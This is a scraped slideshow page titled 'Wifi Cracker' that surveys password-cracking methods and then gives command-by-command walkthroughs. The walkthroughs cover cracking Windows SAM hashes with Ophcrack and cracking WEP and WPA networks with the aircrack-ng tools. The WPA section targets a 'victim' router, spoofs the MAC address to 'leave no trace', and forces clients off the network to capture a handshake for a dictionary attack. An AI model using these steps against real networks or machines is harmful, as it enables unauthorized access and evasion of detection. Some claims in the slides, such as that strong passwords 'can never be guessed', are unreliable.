1 / 41

Wifi Cracker

Wifi Cracker. What Password Cracking. Password cracking is the process of recovering secret passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password.

dasan
Télécharger la présentation

Wifi Cracker

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. WifiCracker

  2. What Password Cracking • Password cracking is the process of recovering secret passwords from data that has been stored in or transmitted by a computer system. • A common approach is to repeatedly try guesses for the password. • Most passwords can be cracked by using following techniques :

  3. Hashing • Here we will refer to the one way function (which may be either an encryption function or cryptographic hash) employed as a hash and its output as a hashed password. • Hash functions like SHA-512, SHA-1, and MD5 are considered impossible to invert when used correctly.

  4. Guessing • Many passwords can be guessed either by humans or by sophisticated cracking programs armed with dictionaries (dictionary based) and the user's personal information. • Not surprisingly, many users choose weak passwords, usually one related to themselves in some way. • Repeated research over some 40 years has demonstrated that around 40% of user-chosen passwords are readily guessable by programs. Examples of insecure choices include:

  5. Guessing • blank (none) • the word "password", "passcode", "admin" and their derivatives • the user's name or login name • the name of their significant other or another person (loved one) • their birthplace or date of birth • a pet's name • automobile licence plate number • a row of letters from a standard keyboard layout (eg, the qwerty keyboard -- qwerty itself, asdf, or qwertyuiop)

  6. Guessing • In one survey of MySpace passwords which had been phished, 3.8 percent of passwords were a single word found in a dictionary, and another 12 percent were a word plus a final digit • A password containing both uppercase & lowercase characters, numbers and special characters too; is a strong password and can never be guessed.

  7. Default Passwords • A moderately high number of local and online applications have inbuilt default passwords that have been configured by programmers during development stages of software. • A list containing default passwords of some of the most popular applications is available on the internet. • Always disable or change the applications' (both online and offline) default username-password pairs.

  8. Brute Force • If all other techniques failed, then attackers uses brute force password cracking technique. • Here an automatic tool is used which tries all possible combinations of available keys on the keyboard. • This techniques takes extremely long time to complete, but password will surely cracked. • Longer is the password, large is the time taken to brute force it.

  9. Phishing • This is the most effective and easily executable password cracking. • Phishing is a technique in which the attacker creates the fake login screen and send it to the victim, hoping that the victim gets fooled into entering the account username and password. • As soon as victim click on "enter" or "login" login button this information reaches to the attacker using scripts or online form.

  10. RainBow Tables • Passwords are normally stored in one-way hashes. • When a password is created, the user types the password in what is called "plain text", since it is in a plain, unhashed form. • However, after a password is made, the computer stores a one-way hash of the password that obfuscates it. • Hashes are made to be one-way, which means algorithmic reversal is impossible. • This means we have to crack those hashes!

  11. Principle • Rainbow tables work on the principle of a time-memory trade-off. • This means that hashes are pre-generated by a computer and stored in a large rainbow table file with all of the hashes and words that correspond to them. • Rainbow cracking can greatly reduce the amount of time it takes to crack a password hash, plus you can keep the tables, so you only have to generate them once!

  12. Download & Install RainbowCrack • RainbowCrackis the tool that we are going to be using to generate and use rainbow tables. • 1. Download RainbowCrack. • tar zxvf <rainbowcrack> • Change to the new directory that has been made from extracting RainbowCrack. • cd <new dir> • 4. Configure the installation. • ./configure • 5. Now, compile the source code for installation. • make && sudo make install

  13. Crack Windows

  14. Crack Windows • Lets get started.... • Insert the Ophcrack Live CD and Boot your PC. Make sure the Boot from CD is the first option in the Boot menu at BIOS. • You'll get the Startup menu. • here choose Ophcrack Graphic mode – automatic • After few old loading shots, it'll redirect to the Linux Desktop. There Click on menu > Run

  15. Crack Windows • In the pop up box type > ophcrack click ok • Now you can see the ophcrack application windows. Here, click on Load > Encrypted SAM • After that we need to give the path to SAM directory which is by default /mnt/hda1/WINDOWS/System32 click choose • Here we can see the saved hashed now with the username and userid. • Now click on Crack button and wait for the password. Its quick and easy • That's it. It'll show the password now Have fun with the cracked password. • Note: Ophcrack is a live Linux CD, it may not work on all the versions of Windows 7 however its working fine with Windows XP/Vista.

  16. Tools for WEP and WPA

  17. airmon-ngairmon-ngstop (interface)ifconfig (interface) downmacchanger —mac 00:11:22:33:44:55 (interface)airmon-ng start (interface)

  18. airodump-ng (interface)

  19. airodump-ng -c (channel) -w (file name) —bssid (bssid) (interface)

  20. aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

  21. aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)

  22. aircrack-ng -b (bssid) (file name-01.cap)

  23. Crack WPA • Step 1: • Run this command to check available Wlan adapters. • airmon-ng • It should give you output something like below. • Now we know that we have only one wireless interface wlan0 lets proceed to step 2

  24. Step 2: • Now lets try to start the airmon service on the interface that we have just . • airmon-ng start wlan0

  25. Crack WPA

  26. Step 3: • You should see another monitoring interface mon0 on your system by using command ifconfig or you can the same command we did on Step 1 • Here we can see the new monitoring interface mon0

  27. Step 4: • A good hacker is always suppose to leave no trace back of his break-in. • If you run the command ifconfig and notice you will find that the monitoring interface mon0 and Wireless interface • Wlan0 are sharing the same MAC address. In actual mon0 is sharing the same mac address as Wlan0.

  28. Now we have to put a fake mac address on the monitoring interface to leave no trace. • Lets make the mon0 interface down by running the command • ifconfig mon0 down • Next lets change the MAC address of mon0 interface by running the below command • macchanger –m 00:11:22:33:44:55 mon0

  29. Now since we have changed the MAC address on MON0 lets bring the interface back up again using the below command • ifconfig mon0 up • Now just to be sure lets run the same command ‘ifconfig’ that we have already used earlier above in • Ifconfig • Here we can see we have sucessfully changed the MAC address for our monitoring interface mon0

  30. Step 5: • Lets start dumping the available wireless information. run the below command • airodump-ng mon0 • Here my Victim router ESSID is AndroidHotSpot. The information we need from here is • BSSID MAC details: D0:C1: B1:5B:AC:33 • CHANNEL: 6

  31. Step 6: • By now we have identified our victim its time to further narrow down this network. We need to know how many workstation/terminal connected to this wireless. • airodump-ng –c 6 –w crackwpa –bssid 02:1A:11:FE:A4:CE

  32. We can see that one client having mac address highlighed in green is connected to this hotspot. • To find the password either you need to be patient to wait another client connect to this hotspot but time is money lets force this client to reconnect and make the handshake auth with the server so that we can take the packets • Note: Keep this ssh session close and open another terminal. Do not close the existing session

  33. Step 7: • Lets force the already connected session to make a auth handshake again • Run the given below command in the new terminal session • aireplay-ng –0 –4 –a MAC-ADDR-OF-ROUTER –c MAC-ADDR-OF-CLIENT mon0

  34. Final Step: • Now finally we have all the dump saved in the working directory we just need to crack the packet capture using dictionary file. • Run the below command • aircrack-ng crackwpa-01.cap –w list • crackwpa-01.cap is the filename of the capture packet • list if the my dictionary file name

More Related